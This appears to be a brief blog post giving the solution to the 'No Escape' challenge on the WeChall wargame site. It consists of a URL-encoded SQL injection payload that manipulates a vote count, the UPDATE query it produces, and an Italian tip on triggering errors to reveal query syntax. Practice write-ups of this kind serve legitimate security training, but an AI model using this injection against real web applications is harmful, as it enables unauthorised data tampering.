No Escape - We Chall;
























vote_for=bill` = `bill` %2b 111 where bill=0 --%20
UPDATE noescvotes SET `bill` = `bill` + 111 where bill=0 --

per vedere la sintassi bisogna far andare in errore l'applicazione inserendo input inaspettato nella url;



Categories: , Share

Leave a Reply